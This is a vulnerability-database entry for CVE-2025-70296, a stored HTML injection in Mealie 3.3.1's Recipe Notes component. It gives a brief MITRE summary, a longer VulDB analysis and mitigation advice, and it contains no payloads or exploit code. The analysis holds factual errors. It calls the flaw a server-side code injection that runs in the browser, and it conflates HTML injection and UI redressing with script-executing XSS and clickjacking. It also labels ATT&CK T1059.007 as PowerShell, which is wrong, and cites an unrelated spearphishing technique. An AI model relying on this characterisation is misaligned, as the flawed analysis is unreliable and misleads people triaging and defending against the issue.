CVE-2025-70296 in Mealie
Summary
by MITRE • 02/11/2026
A stored HTML injection vulnerability in the Recipe Notes rendering component in Mealie 3.3.1 allows remote authenticated users to inject arbitrary HTML, resulting in user interface redressing within the recipe view.
VulDB is the best source for vulnerability data and more expert information about this specific topic.
Analysis
by VulDB Data Team • 02/23/2026
The vulnerability CVE-2025-70296 represents a stored HTML injection flaw within the Recipe Notes rendering component of Mealie version 3.3.1, a popular open-source meal planning and recipe management application. This issue affects the core functionality of the application where user-generated content is displayed in recipe views, creating a significant security risk for authenticated users who can manipulate the application's user interface through malicious input.
The technical implementation of this vulnerability stems from inadequate input sanitization and output encoding within the recipe notes rendering system. When authenticated users submit recipe notes containing HTML content, the application fails to properly validate or escape the input before rendering it in the web interface. This stored injection allows attackers to inject malicious HTML code that persists in the database and executes whenever the recipe view is accessed, creating a server-side code injection vector that operates within the context of the victim's browser session.
From an operational perspective, this vulnerability enables malicious actors to perform user interface redressing attacks, commonly known as UI redressing or clickjacking, where attackers can overlay malicious elements on top of legitimate interface components. The impact extends beyond simple content manipulation as it allows for potential credential theft, session hijacking, and phishing attacks within the application's trusted environment. The authenticated nature of this vulnerability means that attackers do not require external exploitation vectors, as they can leverage existing user sessions to execute malicious code.
The security implications align with CWE-79, which describes Cross-Site Scripting (XSS) vulnerabilities resulting from insufficient input validation and output encoding. This particular variant represents a stored XSS attack pattern where malicious payloads are permanently stored and executed, making it more dangerous than reflected XSS variants. The ATT&CK framework categorizes this vulnerability under T1059.007 for Command and Scripting Interpreter - PowerShell, and T1566.001 for Phishing - Spearphishing Attachment, as attackers can use this vector to deliver malicious payloads that appear legitimate within the application context.
Mitigation strategies should include immediate input validation and output encoding for all user-generated content within the recipe notes component. The application should implement comprehensive HTML sanitization libraries such as DOMPurify or similar tools to strip malicious content while preserving legitimate formatting. Additionally, implementing Content Security Policy (CSP) headers can provide an additional layer of protection against unauthorized script execution. Regular security audits of input handling components, along with prompt patching of identified vulnerabilities, should be prioritized to prevent exploitation. Organizations using Mealie should also consider implementing web application firewalls and monitoring for suspicious content patterns to detect potential exploitation attempts.